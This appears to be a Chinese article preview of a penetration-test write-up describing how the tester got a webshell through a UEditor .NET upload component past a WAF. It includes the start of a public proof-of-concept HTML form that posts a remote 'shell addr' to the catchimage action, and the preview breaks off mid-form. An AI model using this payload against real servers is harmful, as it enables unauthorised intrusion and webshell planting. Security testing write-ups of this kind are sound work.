文章预览
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“ 亿人 安全 “ 设为星标 ”, 否则可能就看不到了啦 原文首发在先知社区 https://xz.aliyun.com/t/15011 前言 前一段时间和小伙伴在某内网进行渗透测试,目标不给加白,只能进行硬刚了,队友fscan一把梭发现某资产疑似存在Ueditor组件,但初步测试是存在waf和杀软的,无法进行getshell,经过一番折腾最终getshell,文笔粗劣,大佬勿喷。 测试 看这返回内容,Ueditor实锤了,采用公开的POC进行尝试,由于是纯内网无法进行出网,直接本机电脑开启Web服务,充当VPS提供Shell地址 http://xx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx < form action = "http://xxx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx? action=catchimage" enctype = "application/x-www-form-urlencoded" method = "POST" > < p > shell addr: < input type = "text" name = "source[]" /> p > < i
………………………………